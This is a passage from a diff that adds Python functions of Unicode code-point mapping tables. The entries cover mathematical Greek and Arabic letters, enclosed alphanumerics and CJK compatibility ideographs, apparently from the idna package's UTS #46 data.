'M', 'φ'), + (0x1D754, 'M', 'ρ'), + (0x1D755, 'M', 'π'), + (0x1D756, 'M', 'α'), + (0x1D757, 'M', 'β'), + (0x1D758, 'M', 'γ'), + (0x1D759, 'M', 'δ'), + (0x1D75A, 'M', 'ε'), + ] + +def _seg_69() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D75B, 'M', 'ζ'), + (0x1D75C, 'M', 'η'), + (0x1D75D, 'M', 'θ'), + (0x1D75E, 'M', 'ι'), + (0x1D75F, 'M', 'κ'), + (0x1D760, 'M', 'λ'), + (0x1D761, 'M', 'μ'), + (0x1D762, 'M', 'ν'), + (0x1D763, 'M', 'ξ'), + (0x1D764, 'M', 'ο'), + (0x1D765, 'M', 'π'), + (0x1D766, 'M', 'ρ'), + (0x1D767, 'M', 'θ'), + (0x1D768, 'M', 'σ'), + (0x1D769, 'M', 'τ'), + (0x1D76A, 'M', 'υ'), + (0x1D76B, 'M', 'φ'), + (0x1D76C, 'M', 'χ'), + (0x1D76D, 'M', 'ψ'), + (0x1D76E, 'M', 'ω'), + (0x1D76F, 'M', '∇'), + (0x1D770, 'M', 'α'), + (0x1D771, 'M', 'β'), + (0x1D772, 'M', 'γ'), + (0x1D773, 'M', 'δ'), + (0x1D774, 'M', 'ε'), + (0x1D775, 'M', 'ζ'), + (0x1D776, 'M', 'η'), + (0x1D777, 'M', 'θ'), + (0x1D778, 'M', 'ι'), + (0x1D779, 'M', 'κ'), + (0x1D77A, 'M', 'λ'), + (0x1D77B, 'M', 'μ'), + (0x1D77C, 'M', 'ν'), + (0x1D77D, 'M', 'ξ'), + (0x1D77E, 'M', 'ο'), + (0x1D77F, 'M', 'π'), + (0x1D780, 'M', 'ρ'), + (0x1D781, 'M', 'σ'), + (0x1D783, 'M', 'τ'), + (0x1D784, 'M', 'υ'), + (0x1D785, 'M', 'φ'), + (0x1D786, 'M', 'χ'), + (0x1D787, 'M', 'ψ'), + (0x1D788, 'M', 'ω'), + (0x1D789, 'M', '∂'), + (0x1D78A, 'M', 'ε'), + (0x1D78B, 'M', 'θ'), + (0x1D78C, 'M', 'κ'), + (0x1D78D, 'M', 'φ'), + (0x1D78E, 'M', 'ρ'), + (0x1D78F, 'M', 'π'), + (0x1D790, 'M', 'α'), + (0x1D791, 'M', 'β'), + (0x1D792, 'M', 'γ'), + (0x1D793, 'M', 'δ'), + (0x1D794, 'M', 'ε'), + (0x1D795, 'M', 'ζ'), + (0x1D796, 'M', 'η'), + (0x1D797, 'M', 'θ'), + (0x1D798, 'M', 'ι'), + (0x1D799, 'M', 'κ'), + (0x1D79A, 'M', 'λ'), + (0x1D79B, 'M', 'μ'), + (0x1D79C, 'M', 'ν'), + (0x1D79D, 'M', 'ξ'), + (0x1D79E, 'M', 'ο'), + (0x1D79F, 'M', 'π'), + (0x1D7A0, 'M', 'ρ'), + (0x1D7A1, 'M', 'θ'), + (0x1D7A2, 'M', 'σ'), + (0x1D7A3, 'M', 'τ'), + (0x1D7A4, 'M', 'υ'), + (0x1D7A5, 'M', 'φ'), + (0x1D7A6, 'M', 'χ'), + (0x1D7A7, 'M', 'ψ'), + (0x1D7A8, 'M', 'ω'), + (0x1D7A9, 'M', '∇'), + (0x1D7AA, 'M', 'α'), + (0x1D7AB, 'M', 'β'), + (0x1D7AC, 'M', 'γ'), + (0x1D7AD, 'M', 'δ'), + (0x1D7AE, 'M', 'ε'), + (0x1D7AF, 'M', 'ζ'), + (0x1D7B0, 'M', 'η'), + (0x1D7B1, 'M', 'θ'), + (0x1D7B2, 'M', 'ι'), + (0x1D7B3, 'M', 'κ'), + (0x1D7B4, 'M', 'λ'), + (0x1D7B5, 'M', 'μ'), + (0x1D7B6, 'M', 'ν'), + (0x1D7B7, 'M', 'ξ'), + (0x1D7B8, 'M', 'ο'), + (0x1D7B9, 'M', 'π'), + (0x1D7BA, 'M', 'ρ'), + (0x1D7BB, 'M', 'σ'), + (0x1D7BD, 'M', 'τ'), + (0x1D7BE, 'M', 'υ'), + (0x1D7BF, 'M', 'φ'), + (0x1D7C0, 'M', 'χ'), + ] + +def _seg_70() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D7C1, 'M', 'ψ'), + (0x1D7C2, 'M', 'ω'), + (0x1D7C3, 'M', '∂'), + (0x1D7C4, 'M', 'ε'), + (0x1D7C5, 'M', 'θ'), + (0x1D7C6, 'M', 'κ'), + (0x1D7C7, 'M', 'φ'), + (0x1D7C8, 'M', 'ρ'), + (0x1D7C9, 'M', 'π'), + (0x1D7CA, 'M', 'ϝ'), + (0x1D7CC, 'X'), + (0x1D7CE, 'M', '0'), + (0x1D7CF, 'M', '1'), + (0x1D7D0, 'M', '2'), + (0x1D7D1, 'M', '3'), + (0x1D7D2, 'M', '4'), + (0x1D7D3, 'M', '5'), + (0x1D7D4, 'M', '6'), + (0x1D7D5, 'M', '7'), + (0x1D7D6, 'M', '8'), + (0x1D7D7, 'M', '9'), + (0x1D7D8, 'M', '0'), + (0x1D7D9, 'M', '1'), + (0x1D7DA, 'M', '2'), + (0x1D7DB, 'M', '3'), + (0x1D7DC, 'M', '4'), + (0x1D7DD, 'M', '5'), + (0x1D7DE, 'M', '6'), + (0x1D7DF, 'M', '7'), + (0x1D7E0, 'M', '8'), + (0x1D7E1, 'M', '9'), + (0x1D7E2, 'M', '0'), + (0x1D7E3, 'M', '1'), + (0x1D7E4, 'M', '2'), + (0x1D7E5, 'M', '3'), + (0x1D7E6, 'M', '4'), + (0x1D7E7, 'M', '5'), + (0x1D7E8, 'M', '6'), + (0x1D7E9, 'M', '7'), + (0x1D7EA, 'M', 
'8'), + (0x1D7EB, 'M', '9'), + (0x1D7EC, 'M', '0'), + (0x1D7ED, 'M', '1'), + (0x1D7EE, 'M', '2'), + (0x1D7EF, 'M', '3'), + (0x1D7F0, 'M', '4'), + (0x1D7F1, 'M', '5'), + (0x1D7F2, 'M', '6'), + (0x1D7F3, 'M', '7'), + (0x1D7F4, 'M', '8'), + (0x1D7F5, 'M', '9'), + (0x1D7F6, 'M', '0'), + (0x1D7F7, 'M', '1'), + (0x1D7F8, 'M', '2'), + (0x1D7F9, 'M', '3'), + (0x1D7FA, 'M', '4'), + (0x1D7FB, 'M', '5'), + (0x1D7FC, 'M', '6'), + (0x1D7FD, 'M', '7'), + (0x1D7FE, 'M', '8'), + (0x1D7FF, 'M', '9'), + (0x1D800, 'V'), + (0x1DA8C, 'X'), + (0x1DA9B, 'V'), + (0x1DAA0, 'X'), + (0x1DAA1, 'V'), + (0x1DAB0, 'X'), + (0x1DF00, 'V'), + (0x1DF1F, 'X'), + (0x1E000, 'V'), + (0x1E007, 'X'), + (0x1E008, 'V'), + (0x1E019, 'X'), + (0x1E01B, 'V'), + (0x1E022, 'X'), + (0x1E023, 'V'), + (0x1E025, 'X'), + (0x1E026, 'V'), + (0x1E02B, 'X'), + (0x1E100, 'V'), + (0x1E12D, 'X'), + (0x1E130, 'V'), + (0x1E13E, 'X'), + (0x1E140, 'V'), + (0x1E14A, 'X'), + (0x1E14E, 'V'), + (0x1E150, 'X'), + (0x1E290, 'V'), + (0x1E2AF, 'X'), + (0x1E2C0, 'V'), + (0x1E2FA, 'X'), + (0x1E2FF, 'V'), + (0x1E300, 'X'), + (0x1E7E0, 'V'), + (0x1E7E7, 'X'), + (0x1E7E8, 'V'), + (0x1E7EC, 'X'), + (0x1E7ED, 'V'), + (0x1E7EF, 'X'), + (0x1E7F0, 'V'), + ] + +def _seg_71() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1E7FF, 'X'), + (0x1E800, 'V'), + (0x1E8C5, 'X'), + (0x1E8C7, 'V'), + (0x1E8D7, 'X'), + (0x1E900, 'M', '𞤢'), + (0x1E901, 'M', '𞤣'), + (0x1E902, 'M', '𞤤'), + (0x1E903, 'M', '𞤥'), + (0x1E904, 'M', '𞤦'), + (0x1E905, 'M', '𞤧'), + (0x1E906, 'M', '𞤨'), + (0x1E907, 'M', '𞤩'), + (0x1E908, 'M', '𞤪'), + (0x1E909, 'M', '𞤫'), + (0x1E90A, 'M', '𞤬'), + (0x1E90B, 'M', '𞤭'), + (0x1E90C, 'M', '𞤮'), + (0x1E90D, 'M', '𞤯'), + (0x1E90E, 'M', '𞤰'), + (0x1E90F, 'M', '𞤱'), + (0x1E910, 'M', '𞤲'), + (0x1E911, 'M', '𞤳'), + (0x1E912, 'M', '𞤴'), + (0x1E913, 'M', '𞤵'), + (0x1E914, 'M', '𞤶'), + (0x1E915, 'M', '𞤷'), + (0x1E916, 'M', '𞤸'), + (0x1E917, 'M', '𞤹'), + (0x1E918, 'M', '𞤺'), + (0x1E919, 'M', '𞤻'), + (0x1E91A, 'M', '𞤼'), + (0x1E91B, 'M', '𞤽'), + (0x1E91C, 'M', '𞤾'), + (0x1E91D, 'M', '𞤿'), + (0x1E91E, 'M', '𞥀'), + (0x1E91F, 'M', '𞥁'), + (0x1E920, 'M', '𞥂'), + (0x1E921, 'M', '𞥃'), + (0x1E922, 'V'), + (0x1E94C, 'X'), + (0x1E950, 'V'), + (0x1E95A, 'X'), + (0x1E95E, 'V'), + (0x1E960, 'X'), + (0x1EC71, 'V'), + (0x1ECB5, 'X'), + (0x1ED01, 'V'), + (0x1ED3E, 'X'), + (0x1EE00, 'M', 'ا'), + (0x1EE01, 'M', 'ب'), + (0x1EE02, 'M', 'ج'), + (0x1EE03, 'M', 'د'), + (0x1EE04, 'X'), + (0x1EE05, 'M', 'و'), + (0x1EE06, 'M', 'ز'), + (0x1EE07, 'M', 'ح'), + (0x1EE08, 'M', 'ط'), + (0x1EE09, 'M', 'ي'), + (0x1EE0A, 'M', 'ك'), + (0x1EE0B, 'M', 'ل'), + (0x1EE0C, 'M', 'م'), + (0x1EE0D, 'M', 'ن'), + (0x1EE0E, 'M', 'س'), + (0x1EE0F, 'M', 'ع'), + (0x1EE10, 'M', 'ف'), + (0x1EE11, 'M', 'ص'), + (0x1EE12, 'M', 'ق'), + (0x1EE13, 'M', 'ر'), + (0x1EE14, 'M', 'ش'), + (0x1EE15, 'M', 'ت'), + (0x1EE16, 'M', 'ث'), + (0x1EE17, 'M', 'خ'), + (0x1EE18, 'M', 'ذ'), + (0x1EE19, 'M', 'ض'), + (0x1EE1A, 'M', 'ظ'), + (0x1EE1B, 'M', 'غ'), + (0x1EE1C, 'M', 'ٮ'), + (0x1EE1D, 'M', 'ں'), + (0x1EE1E, 'M', 'ڡ'), + (0x1EE1F, 'M', 'ٯ'), + (0x1EE20, 'X'), + (0x1EE21, 'M', 'ب'), + (0x1EE22, 'M', 'ج'), + (0x1EE23, 'X'), + (0x1EE24, 'M', 'ه'), + (0x1EE25, 'X'), + (0x1EE27, 'M', 'ح'), + (0x1EE28, 'X'), + (0x1EE29, 'M', 'ي'), + (0x1EE2A, 'M', 'ك'), + (0x1EE2B, 'M', 'ل'), + (0x1EE2C, 'M', 'م'), + (0x1EE2D, 'M', 'ن'), + (0x1EE2E, 'M', 'س'), + (0x1EE2F, 'M', 'ع'), + (0x1EE30, 'M', 'ف'), + (0x1EE31, 'M', 'ص'), + (0x1EE32, 'M', 'ق'), + (0x1EE33, 'X'), + ] + +def _seg_72() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + 
return [ + (0x1EE34, 'M', 'ش'), + (0x1EE35, 'M', 'ت'), + (0x1EE36, 'M', 'ث'), + (0x1EE37, 'M', 'خ'), + (0x1EE38, 'X'), + (0x1EE39, 'M', 'ض'), + (0x1EE3A, 'X'), + (0x1EE3B, 'M', 'غ'), + (0x1EE3C, 'X'), + (0x1EE42, 'M', 'ج'), + (0x1EE43, 'X'), + (0x1EE47, 'M', 'ح'), + (0x1EE48, 'X'), + (0x1EE49, 'M', 'ي'), + (0x1EE4A, 'X'), + (0x1EE4B, 'M', 'ل'), + (0x1EE4C, 'X'), + (0x1EE4D, 'M', 'ن'), + (0x1EE4E, 'M', 'س'), + (0x1EE4F, 'M', 'ع'), + (0x1EE50, 'X'), + (0x1EE51, 'M', 'ص'), + (0x1EE52, 'M', 'ق'), + (0x1EE53, 'X'), + (0x1EE54, 'M', 'ش'), + (0x1EE55, 'X'), + (0x1EE57, 'M', 'خ'), + (0x1EE58, 'X'), + (0x1EE59, 'M', 'ض'), + (0x1EE5A, 'X'), + (0x1EE5B, 'M', 'غ'), + (0x1EE5C, 'X'), + (0x1EE5D, 'M', 'ں'), + (0x1EE5E, 'X'), + (0x1EE5F, 'M', 'ٯ'), + (0x1EE60, 'X'), + (0x1EE61, 'M', 'ب'), + (0x1EE62, 'M', 'ج'), + (0x1EE63, 'X'), + (0x1EE64, 'M', 'ه'), + (0x1EE65, 'X'), + (0x1EE67, 'M', 'ح'), + (0x1EE68, 'M', 'ط'), + (0x1EE69, 'M', 'ي'), + (0x1EE6A, 'M', 'ك'), + (0x1EE6B, 'X'), + (0x1EE6C, 'M', 'م'), + (0x1EE6D, 'M', 'ن'), + (0x1EE6E, 'M', 'س'), + (0x1EE6F, 'M', 'ع'), + (0x1EE70, 'M', 'ف'), + (0x1EE71, 'M', 'ص'), + (0x1EE72, 'M', 'ق'), + (0x1EE73, 'X'), + (0x1EE74, 'M', 'ش'), + (0x1EE75, 'M', 'ت'), + (0x1EE76, 'M', 'ث'), + (0x1EE77, 'M', 'خ'), + (0x1EE78, 'X'), + (0x1EE79, 'M', 'ض'), + (0x1EE7A, 'M', 'ظ'), + (0x1EE7B, 'M', 'غ'), + (0x1EE7C, 'M', 'ٮ'), + (0x1EE7D, 'X'), + (0x1EE7E, 'M', 'ڡ'), + (0x1EE7F, 'X'), + (0x1EE80, 'M', 'ا'), + (0x1EE81, 'M', 'ب'), + (0x1EE82, 'M', 'ج'), + (0x1EE83, 'M', 'د'), + (0x1EE84, 'M', 'ه'), + (0x1EE85, 'M', 'و'), + (0x1EE86, 'M', 'ز'), + (0x1EE87, 'M', 'ح'), + (0x1EE88, 'M', 'ط'), + (0x1EE89, 'M', 'ي'), + (0x1EE8A, 'X'), + (0x1EE8B, 'M', 'ل'), + (0x1EE8C, 'M', 'م'), + (0x1EE8D, 'M', 'ن'), + (0x1EE8E, 'M', 'س'), + (0x1EE8F, 'M', 'ع'), + (0x1EE90, 'M', 'ف'), + (0x1EE91, 'M', 'ص'), + (0x1EE92, 'M', 'ق'), + (0x1EE93, 'M', 'ر'), + (0x1EE94, 'M', 'ش'), + (0x1EE95, 'M', 'ت'), + (0x1EE96, 'M', 'ث'), + (0x1EE97, 'M', 'خ'), + (0x1EE98, 'M', 'ذ'), + (0x1EE99, 'M', 'ض'), + (0x1EE9A, 'M', 'ظ'), + (0x1EE9B, 'M', 'غ'), + (0x1EE9C, 'X'), + (0x1EEA1, 'M', 'ب'), + (0x1EEA2, 'M', 'ج'), + (0x1EEA3, 'M', 'د'), + (0x1EEA4, 'X'), + (0x1EEA5, 'M', 'و'), + ] + +def _seg_73() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1EEA6, 'M', 'ز'), + (0x1EEA7, 'M', 'ح'), + (0x1EEA8, 'M', 'ط'), + (0x1EEA9, 'M', 'ي'), + (0x1EEAA, 'X'), + (0x1EEAB, 'M', 'ل'), + (0x1EEAC, 'M', 'م'), + (0x1EEAD, 'M', 'ن'), + (0x1EEAE, 'M', 'س'), + (0x1EEAF, 'M', 'ع'), + (0x1EEB0, 'M', 'ف'), + (0x1EEB1, 'M', 'ص'), + (0x1EEB2, 'M', 'ق'), + (0x1EEB3, 'M', 'ر'), + (0x1EEB4, 'M', 'ش'), + (0x1EEB5, 'M', 'ت'), + (0x1EEB6, 'M', 'ث'), + (0x1EEB7, 'M', 'خ'), + (0x1EEB8, 'M', 'ذ'), + (0x1EEB9, 'M', 'ض'), + (0x1EEBA, 'M', 'ظ'), + (0x1EEBB, 'M', 'غ'), + (0x1EEBC, 'X'), + (0x1EEF0, 'V'), + (0x1EEF2, 'X'), + (0x1F000, 'V'), + (0x1F02C, 'X'), + (0x1F030, 'V'), + (0x1F094, 'X'), + (0x1F0A0, 'V'), + (0x1F0AF, 'X'), + (0x1F0B1, 'V'), + (0x1F0C0, 'X'), + (0x1F0C1, 'V'), + (0x1F0D0, 'X'), + (0x1F0D1, 'V'), + (0x1F0F6, 'X'), + (0x1F101, '3', '0,'), + (0x1F102, '3', '1,'), + (0x1F103, '3', '2,'), + (0x1F104, '3', '3,'), + (0x1F105, '3', '4,'), + (0x1F106, '3', '5,'), + (0x1F107, '3', '6,'), + (0x1F108, '3', '7,'), + (0x1F109, '3', '8,'), + (0x1F10A, '3', '9,'), + (0x1F10B, 'V'), + (0x1F110, '3', '(a)'), + (0x1F111, '3', '(b)'), + (0x1F112, '3', '(c)'), + (0x1F113, '3', '(d)'), + (0x1F114, '3', '(e)'), + (0x1F115, '3', '(f)'), + (0x1F116, '3', '(g)'), + (0x1F117, '3', '(h)'), + (0x1F118, '3', '(i)'), + (0x1F119, '3', '(j)'), + 
(0x1F11A, '3', '(k)'), + (0x1F11B, '3', '(l)'), + (0x1F11C, '3', '(m)'), + (0x1F11D, '3', '(n)'), + (0x1F11E, '3', '(o)'), + (0x1F11F, '3', '(p)'), + (0x1F120, '3', '(q)'), + (0x1F121, '3', '(r)'), + (0x1F122, '3', '(s)'), + (0x1F123, '3', '(t)'), + (0x1F124, '3', '(u)'), + (0x1F125, '3', '(v)'), + (0x1F126, '3', '(w)'), + (0x1F127, '3', '(x)'), + (0x1F128, '3', '(y)'), + (0x1F129, '3', '(z)'), + (0x1F12A, 'M', '〔s〕'), + (0x1F12B, 'M', 'c'), + (0x1F12C, 'M', 'r'), + (0x1F12D, 'M', 'cd'), + (0x1F12E, 'M', 'wz'), + (0x1F12F, 'V'), + (0x1F130, 'M', 'a'), + (0x1F131, 'M', 'b'), + (0x1F132, 'M', 'c'), + (0x1F133, 'M', 'd'), + (0x1F134, 'M', 'e'), + (0x1F135, 'M', 'f'), + (0x1F136, 'M', 'g'), + (0x1F137, 'M', 'h'), + (0x1F138, 'M', 'i'), + (0x1F139, 'M', 'j'), + (0x1F13A, 'M', 'k'), + (0x1F13B, 'M', 'l'), + (0x1F13C, 'M', 'm'), + (0x1F13D, 'M', 'n'), + (0x1F13E, 'M', 'o'), + (0x1F13F, 'M', 'p'), + (0x1F140, 'M', 'q'), + (0x1F141, 'M', 'r'), + (0x1F142, 'M', 's'), + (0x1F143, 'M', 't'), + ] + +def _seg_74() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1F144, 'M', 'u'), + (0x1F145, 'M', 'v'), + (0x1F146, 'M', 'w'), + (0x1F147, 'M', 'x'), + (0x1F148, 'M', 'y'), + (0x1F149, 'M', 'z'), + (0x1F14A, 'M', 'hv'), + (0x1F14B, 'M', 'mv'), + (0x1F14C, 'M', 'sd'), + (0x1F14D, 'M', 'ss'), + (0x1F14E, 'M', 'ppv'), + (0x1F14F, 'M', 'wc'), + (0x1F150, 'V'), + (0x1F16A, 'M', 'mc'), + (0x1F16B, 'M', 'md'), + (0x1F16C, 'M', 'mr'), + (0x1F16D, 'V'), + (0x1F190, 'M', 'dj'), + (0x1F191, 'V'), + (0x1F1AE, 'X'), + (0x1F1E6, 'V'), + (0x1F200, 'M', 'ほか'), + (0x1F201, 'M', 'ココ'), + (0x1F202, 'M', 'サ'), + (0x1F203, 'X'), + (0x1F210, 'M', '手'), + (0x1F211, 'M', '字'), + (0x1F212, 'M', '双'), + (0x1F213, 'M', 'デ'), + (0x1F214, 'M', '二'), + (0x1F215, 'M', '多'), + (0x1F216, 'M', '解'), + (0x1F217, 'M', '天'), + (0x1F218, 'M', '交'), + (0x1F219, 'M', '映'), + (0x1F21A, 'M', '無'), + (0x1F21B, 'M', '料'), + (0x1F21C, 'M', '前'), + (0x1F21D, 'M', '後'), + (0x1F21E, 'M', '再'), + (0x1F21F, 'M', '新'), + (0x1F220, 'M', '初'), + (0x1F221, 'M', '終'), + (0x1F222, 'M', '生'), + (0x1F223, 'M', '販'), + (0x1F224, 'M', '声'), + (0x1F225, 'M', '吹'), + (0x1F226, 'M', '演'), + (0x1F227, 'M', '投'), + (0x1F228, 'M', '捕'), + (0x1F229, 'M', '一'), + (0x1F22A, 'M', '三'), + (0x1F22B, 'M', '遊'), + (0x1F22C, 'M', '左'), + (0x1F22D, 'M', '中'), + (0x1F22E, 'M', '右'), + (0x1F22F, 'M', '指'), + (0x1F230, 'M', '走'), + (0x1F231, 'M', '打'), + (0x1F232, 'M', '禁'), + (0x1F233, 'M', '空'), + (0x1F234, 'M', '合'), + (0x1F235, 'M', '満'), + (0x1F236, 'M', '有'), + (0x1F237, 'M', '月'), + (0x1F238, 'M', '申'), + (0x1F239, 'M', '割'), + (0x1F23A, 'M', '営'), + (0x1F23B, 'M', '配'), + (0x1F23C, 'X'), + (0x1F240, 'M', '〔本〕'), + (0x1F241, 'M', '〔三〕'), + (0x1F242, 'M', '〔二〕'), + (0x1F243, 'M', '〔安〕'), + (0x1F244, 'M', '〔点〕'), + (0x1F245, 'M', '〔打〕'), + (0x1F246, 'M', '〔盗〕'), + (0x1F247, 'M', '〔勝〕'), + (0x1F248, 'M', '〔敗〕'), + (0x1F249, 'X'), + (0x1F250, 'M', '得'), + (0x1F251, 'M', '可'), + (0x1F252, 'X'), + (0x1F260, 'V'), + (0x1F266, 'X'), + (0x1F300, 'V'), + (0x1F6D8, 'X'), + (0x1F6DD, 'V'), + (0x1F6ED, 'X'), + (0x1F6F0, 'V'), + (0x1F6FD, 'X'), + (0x1F700, 'V'), + (0x1F774, 'X'), + (0x1F780, 'V'), + (0x1F7D9, 'X'), + (0x1F7E0, 'V'), + (0x1F7EC, 'X'), + (0x1F7F0, 'V'), + (0x1F7F1, 'X'), + (0x1F800, 'V'), + ] + +def _seg_75() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1F80C, 'X'), + (0x1F810, 'V'), + (0x1F848, 'X'), + (0x1F850, 'V'), + (0x1F85A, 'X'), + (0x1F860, 'V'), + (0x1F888, 'X'), + (0x1F890, 'V'), + (0x1F8AE, 'X'), + (0x1F8B0, 'V'), + 
(0x1F8B2, 'X'), + (0x1F900, 'V'), + (0x1FA54, 'X'), + (0x1FA60, 'V'), + (0x1FA6E, 'X'), + (0x1FA70, 'V'), + (0x1FA75, 'X'), + (0x1FA78, 'V'), + (0x1FA7D, 'X'), + (0x1FA80, 'V'), + (0x1FA87, 'X'), + (0x1FA90, 'V'), + (0x1FAAD, 'X'), + (0x1FAB0, 'V'), + (0x1FABB, 'X'), + (0x1FAC0, 'V'), + (0x1FAC6, 'X'), + (0x1FAD0, 'V'), + (0x1FADA, 'X'), + (0x1FAE0, 'V'), + (0x1FAE8, 'X'), + (0x1FAF0, 'V'), + (0x1FAF7, 'X'), + (0x1FB00, 'V'), + (0x1FB93, 'X'), + (0x1FB94, 'V'), + (0x1FBCB, 'X'), + (0x1FBF0, 'M', '0'), + (0x1FBF1, 'M', '1'), + (0x1FBF2, 'M', '2'), + (0x1FBF3, 'M', '3'), + (0x1FBF4, 'M', '4'), + (0x1FBF5, 'M', '5'), + (0x1FBF6, 'M', '6'), + (0x1FBF7, 'M', '7'), + (0x1FBF8, 'M', '8'), + (0x1FBF9, 'M', '9'), + (0x1FBFA, 'X'), + (0x20000, 'V'), + (0x2A6E0, 'X'), + (0x2A700, 'V'), + (0x2B739, 'X'), + (0x2B740, 'V'), + (0x2B81E, 'X'), + (0x2B820, 'V'), + (0x2CEA2, 'X'), + (0x2CEB0, 'V'), + (0x2EBE1, 'X'), + (0x2F800, 'M', '丽'), + (0x2F801, 'M', '丸'), + (0x2F802, 'M', '乁'), + (0x2F803, 'M', '𠄢'), + (0x2F804, 'M', '你'), + (0x2F805, 'M', '侮'), + (0x2F806, 'M', '侻'), + (0x2F807, 'M', '倂'), + (0x2F808, 'M', '偺'), + (0x2F809, 'M', '備'), + (0x2F80A, 'M', '僧'), + (0x2F80B, 'M', '像'), + (0x2F80C, 'M', '㒞'), + (0x2F80D, 'M', '𠘺'), + (0x2F80E, 'M', '免'), + (0x2F80F, 'M', '兔'), + (0x2F810, 'M', '兤'), + (0x2F811, 'M', '具'), + (0x2F812, 'M', '𠔜'), + (0x2F813, 'M', '㒹'), + (0x2F814, 'M', '內'), + (0x2F815, 'M', '再'), + (0x2F816, 'M', '𠕋'), + (0x2F817, 'M', '冗'), + (0x2F818, 'M', '冤'), + (0x2F819, 'M', '仌'), + (0x2F81A, 'M', '冬'), + (0x2F81B, 'M', '况'), + (0x2F81C, 'M', '𩇟'), + (0x2F81D, 'M', '凵'), + (0x2F81E, 'M', '刃'), + (0x2F81F, 'M', '㓟'), + (0x2F820, 'M', '刻'), + (0x2F821, 'M', '剆'), + (0x2F822, 'M', '割'), + (0x2F823, 'M', '剷'), + (0x2F824, 'M', '㔕'), + (0x2F825, 'M', '勇'), + (0x2F826, 'M', '勉'), + (0x2F827, 'M', '勤'), + (0x2F828, 'M', '勺'), + (0x2F829, 'M', '包'), + ] + +def _seg_76() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2F82A, 'M', '匆'), + (0x2F82B, 'M', '北'), + (0x2F82C, 'M', '卉'), + (0x2F82D, 'M', '卑'), + (0x2F82E, 'M', '博'), + (0x2F82F, 'M', '即'), + (0x2F830, 'M', '卽'), + (0x2F831, 'M', '卿'), + (0x2F834, 'M', '𠨬'), + (0x2F835, 'M', '灰'), + (0x2F836, 'M', '及'), + (0x2F837, 'M', '叟'), + (0x2F838, 'M', '𠭣'), + (0x2F839, 'M', '叫'), + (0x2F83A, 'M', '叱'), + (0x2F83B, 'M', '吆'), + (0x2F83C, 'M', '咞'), + (0x2F83D, 'M', '吸'), + (0x2F83E, 'M', '呈'), + (0x2F83F, 'M', '周'), + (0x2F840, 'M', '咢'), + (0x2F841, 'M', '哶'), + (0x2F842, 'M', '唐'), + (0x2F843, 'M', '啓'), + (0x2F844, 'M', '啣'), + (0x2F845, 'M', '善'), + (0x2F847, 'M', '喙'), + (0x2F848, 'M', '喫'), + (0x2F849, 'M', '喳'), + (0x2F84A, 'M', '嗂'), + (0x2F84B, 'M', '圖'), + (0x2F84C, 'M', '嘆'), + (0x2F84D, 'M', '圗'), + (0x2F84E, 'M', '噑'), + (0x2F84F, 'M', '噴'), + (0x2F850, 'M', '切'), + (0x2F851, 'M', '壮'), + (0x2F852, 'M', '城'), + (0x2F853, 'M', '埴'), + (0x2F854, 'M', '堍'), + (0x2F855, 'M', '型'), + (0x2F856, 'M', '堲'), + (0x2F857, 'M', '報'), + (0x2F858, 'M', '墬'), + (0x2F859, 'M', '𡓤'), + (0x2F85A, 'M', '売'), + (0x2F85B, 'M', '壷'), + (0x2F85C, 'M', '夆'), + (0x2F85D, 'M', '多'), + (0x2F85E, 'M', '夢'), + (0x2F85F, 'M', '奢'), + (0x2F860, 'M', '𡚨'), + (0x2F861, 'M', '𡛪'), + (0x2F862, 'M', '姬'), + (0x2F863, 'M', '娛'), + (0x2F864, 'M', '娧'), + (0x2F865, 'M', '姘'), + (0x2F866, 'M', '婦'), + (0x2F867, 'M', '㛮'), + (0x2F868, 'X'), + (0x2F869, 'M', '嬈'), + (0x2F86A, 'M', '嬾'), + (0x2F86C, 'M', '𡧈'), + (0x2F86D, 'M', '寃'), + (0x2F86E, 'M', '寘'), + (0x2F86F, 'M', '寧'), + (0x2F870, 'M', '寳'), + (0x2F871, 'M', '𡬘'), + (0x2F872, 'M', '寿'), + 
(0x2F873, 'M', '将'), + (0x2F874, 'X'), + (0x2F875, 'M', '尢'), + (0x2F876, 'M', '㞁'), + (0x2F877, 'M', '屠'), + (0x2F878, 'M', '屮'), + (0x2F879, 'M', '峀'), + (0x2F87A, 'M', '岍'), + (0x2F87B, 'M', '𡷤'), + (0x2F87C, 'M', '嵃'), + (0x2F87D, 'M', '𡷦'), + (0x2F87E, 'M', '嵮'), + (0x2F87F, 'M', '嵫'), + (0x2F880, 'M', '嵼'), + (0x2F881, 'M', '巡'), + (0x2F882, 'M', '巢'), + (0x2F883, 'M', '㠯'), + (0x2F884, 'M', '巽'), + (0x2F885, 'M', '帨'), + (0x2F886, 'M', '帽'), + (0x2F887, 'M', '幩'), + (0x2F888, 'M', '㡢'), + (0x2F889, 'M', '𢆃'), + (0x2F88A, 'M', '㡼'), + (0x2F88B, 'M', '庰'), + (0x2F88C, 'M', '庳'), + (0x2F88D, 'M', '庶'), + (0x2F88E, 'M', '廊'), + (0x2F88F, 'M', '𪎒'), + (0x2F890, 'M', '廾'), + (0x2F891, 'M', '𢌱'), + ] + +def _seg_77() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2F893, 'M', '舁'), + (0x2F894, 'M', '弢'), + (0x2F896, 'M', '㣇'), + (0x2F897, 'M', '𣊸'), + (0x2F898, 'M', '𦇚'), + (0x2F899, 'M', '形'), + (0x2F89A, 'M', '彫'), + (0x2F89B, 'M', '㣣'), + (0x2F89C, 'M', '徚'), + (0x2F89D, 'M', '忍'), + (0x2F89E, 'M', '志'), + (0x2F89F, 'M', '忹'), + (0x2F8A0, 'M', '悁'), + (0x2F8A1, 'M', '㤺'), + (0x2F8A2, 'M', '㤜'), + (0x2F8A3, 'M', '悔'), + (0x2F8A4, 'M', '𢛔'), + (0x2F8A5, 'M', '惇'), + (0x2F8A6, 'M', '慈'), + (0x2F8A7, 'M', '慌'), + (0x2F8A8, 'M', '慎'), + (0x2F8A9, 'M', '慌'), + (0x2F8AA, 'M', '慺'), + (0x2F8AB, 'M', '憎'), + (0x2F8AC, 'M', '憲'), + (0x2F8AD, 'M', '憤'), + (0x2F8AE, 'M', '憯'), + (0x2F8AF, 